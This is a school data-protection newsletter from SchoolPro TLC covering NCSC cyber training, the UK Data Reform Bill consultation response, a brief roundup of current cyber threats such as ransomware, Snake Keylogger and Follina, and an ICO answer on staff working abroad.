It has been a busy few months for us as we launched our brand new online Data Protection Portal. We hope you have had a chance to login and use the new and improved tool including its new data mapping and audit tools. This new portal has enabled us to make a step-change in the way that we support schools. If we haven’t visited you since we launched the portal, please get in touch and we will book in a date (either in-person or remote) to come and see you.
The main topic this month focuses on the free Cyber Security for School Staff training course (written by the NCSC) on our learning platform that has now been approved by the RPA as valid for RPA member schools in the event they need to make a cyber claim. There is also:
- our first thoughts on the consultation response for the new Data Reform Bill;
- guidance on handling subject access requests;
- our partner spotlight highlighting a company we work with and recommend;
- the latest information on recent and current cyber threats;
- a previously asked question about international transfers of data if working abroad; and
- the latest on the new & updated resources in Global Documents since the last newsletter.
You can still download our ‘All Staff’ update based on the content of this newsletter by clicking on the image to the side.
And, as always, if you have any further questions about the topics below, or if you would like to book your next visit from us, either online using video conferencing or onsite now many schools are accepting visitors, please get in touch via our new email address DPO@schoolpro.uk.
Don’t forget, if there is anything else that you need support with at this time, please ask and we will do whatever we can within our capacity to assist.
Stay safe and healthy!
DfE RPA Approval for Cyber Security Training
We have recently had confirmation from the RPA that our version of the NCSC “Cyber Security for School Staff” training course fulfils their requirements for schools / academies. They stated that they “can confirm that RPA member schools are able to use your learning platform to evidence completion of the NCSC training in the event of a cyber claim.”
If you are not already aware, we have taken the NCSC course and adapted it to our learning platform which means you can enrol staff and track their progress, and that staff will receive appropriately named/dated certificates at the end of the course. It is the same content as the NCSC course and is free on our platform.
Data Reform Bill
Last week saw the release of the Government’s response to their consultation on the proposed Data Reform Bill.
It is very much still early days for this proposed legislation but below you can read some of our initial reaction and thoughts and how it might impact how we work with you in the future. There is a lot to go through from this response. It is unclear at this stage what the timeline is for the new legislation and exactly what it will look like based on this response. However, we have picked out a few points that we think could have an impact on schools:
Privacy Management Programs to be a compliance requirement
This is one that we have been expecting and built the online audit/accountability tool in the new portal with this possibility in mind. Essentially, the proposal is to reduce down the accountability requirement to 6 key areas (from the current 10). These are:
- leadership and oversight
- risk assessment
- policies and processes
- training and awareness of staff
- monitoring, evaluation and improvement
This potentially simplifies the process and our audit tool has been developed to be fully configurable so, if this change does go ahead as suggested, the existing tool can be adapted to the new Privacy Management Program and relevant information, actions etc already in the tool, can be ported across as required. The Government have been keen to highlight that this is not to reduce the rigour of accountability and lower standards, but to create a more flexible tool that can scale depending on the risk level of the organisations. This may well ease some of the burden on smaller schools, for example.
Data Protection Officers to no longer be mandatory and to be replaced with a ‘senior responsible individual’
This proposal removes the need for an independent DPO with no conflicts of interest and allows the role to be taken on by a senior individual within the organisation. That person will still fulfil many of the existing roles of a DPO so it is likely that many organisations will simply continue with their existing arrangement. The ‘senior responsible individual’ will be responsible for:
- representing or delegating a representative to the ICO and data subjects
- ensuring appropriate oversight and support is in place for the programme and appointing appropriate personnel
- providing tailored training to ensure staff understand the organisation’s policies
- regularly auditing the efficacy of the programme.
At present, it isn’t fully clear if this will apply to all organisations or whether it will be only small organisations and those that don’t process high levels of sensitive data that are able to drop the requirement for a “DPO”. We are going to obviously be keeping a keen eye on this one!
Removal of Data Protection Impact Assessments (DPIAs)
The thought here is to provide a more flexible and tailored approach to organisations. Again, the Government are keen to emphasise that this isn’t to reduce rigour and lower standards. And they state that organisations will still have to identify, assess and manage risk. This may allow for a more risk-based approach where lower risk processing has a simpler risk management approach and higher risk processing still follows a similar DPIA process to what is currently in place. However this is implemented, thankfully, this shouldn’t involve new risk management for legacy systems as the Government has stated that “existing DPIAs would remain valid as a way of achieving the new requirement.”
Removal of the Record of Processing Activities (RoPA) requirement
As with DPIAs, this is to provide a more flexible approach that can be tailored to different organisation depending on size and the nature of their processing activities. This will link to the Privacy Management Programs and will require organisations to have “personal data inventories” which “describe what and where personal data is held, why it has been collected and how sensitive it is”. From what we’ve read so far, we believe that our existing data mapping tool will allow for these inventories to be created still with very little need to be adapted from their current format.
Those are a few of the points we think will have an immediate impact on schools. There are more detailed analyses available online of all of the proposals, of course, such as this useful one from the IAPP – UK data protection reform: What is in the government’s proposals? (iapp.org)
It is also clear that not everyone is happy with the proposals. Reading through the response, the prevailing theme appears to be “we asked about this, most of you weren’t happy with proposed changes… so we’re going to make some anyway” which is an interesting approach to a consultation. In our SLT days, we often did student consultations and produced “you said, we did” responses to the students. This has been more of a “you said, we did something else”. And there are likely to be legal challenges as a result:
All we can say is, watch this space…
Subject Access Request Guidance
Recent and Current Cyber Threats
Increased Ransomware Threat
We are going to publish this again because we think it is important and we are still seeing a lot of phishing emails and similar threats circulating in schools.
UK, US, and Australian cyber experts are warning of a “growing wave of increasingly sophisticated ransomware attacks”. Lindy Cameron, the chief executive of the UK National Cyber Security Centre (NCSC), has warned that ransomware is “a rising global threat with potentially devastating consequences”. Organisations can get advice about how to prevent and protect against ransomware at the NCSC ransomware hub here:
Warnings have also gone out in the past fortnight with regards to an increased cyber threat as a possible consequence of the on going situation in Ukraine. More information on what actions you can take can be found here:
New Email Security Tool
The NCSC has launched a new email security tool to assist organisations in checking their defences. The security service check helps organisations to identify vulnerabilities. More information can be found here:
NCSC Expands Services to Protect Against Online Scams
A record number of scams were removed online in 2021. This was due to the Active Cyber Defence programme and the National Cyber Security Centre has significantly expanded its services in order to protect the UK against this new level of threat. Read on for more:
Other Threats Identified…
- Snake Keylogger Malware Being Spread in PDF Files – Online security experts are warning people to take extra care when downloading PDF files after PDFs were recently used in campaigns to deliver Snake Keylogger malware. Snake Keylogger, which is eighth place in Check Point’s Global Threat Index, records a user’s keystrokes and transmits the collected data to cybercriminals. The advice is to use a robust email security solution that quarantines and inspects attachments. (Cheltenham IT Support | Reform IT)
- Microsoft Office Users Warned About Word Malware Scam – Cybersecurity expert, Kevin Beaumont, has warned Microsoft Office users about a scam that uses a hole in a Microsoft Word. The scam, dubbed “Follina”, involves cybercriminals leveraging a Windows utility called msdt.exe to cause victims to download a malware-loaded Word file. The malware could allow attackers to run arbitrary code, install programs, change or delete data, or create new accounts. Microsoft has issued workaround guidance. (Cheltenham IT Support | Reform IT)
- QuickBooks Customers Targeted by Phishing Attacks – Tax software vendor Intuit has warned that QuickBooks customers are being targeted with phishing attacks that are impersonating the company and are designed to lure targets with fake account suspension warnings. The phishing emails ask targets to click on a “Complete Verification” button which re-directs them to a phishing site designed to harvest personal information or infect their system with malware. The advice to QuickBooks customers is not to click any embedded links or open attachments, and to delete the messages from the inbox. (Cheltenham IT Support | Reform IT)
Previously Asked Question
Do staff working remotely abroad require international transfers of data and relevant safeguards being implemented?
In this case, the member of staff was having to stay overseas due to Covid restrictions and therefore work remotely until they could return to the UK. This could also apply if you had staff working remotely from countries outside the UK and that don’t have adequacy agreements in place. The ICO provided the following advice:
This wouldn’t class as an international transfer, because the receiver of the personal data wouldn’t be legally distinct from the sender, i.e. the person accessing the data is a member of staff rather than a separate entity. Accessing data in a third country would class as a transfer if the scenario did involve two separate legal persons. [However, in this instance,] you don’t need to consider it as an international transfer (implement an appropriate safeguard etc.) but you do need to apply appropriate security measures.
New & Updated Resources on the Portal
- Letter – Data Breach Notification Template.
- Flowchart for the Handling of FOI Requests.
- Template – Legitimate Interests Assessment.
- DPIA – Wonde – DfE Attendance Data Collection
- Minor updates based on information received from the DfE.
Data Protection in the News
SchoolPro TLC Ltd (2022)
SchoolPro TLC guidance does not constitute legal advice.
SchoolPro TLC is not responsible for the content of external websites.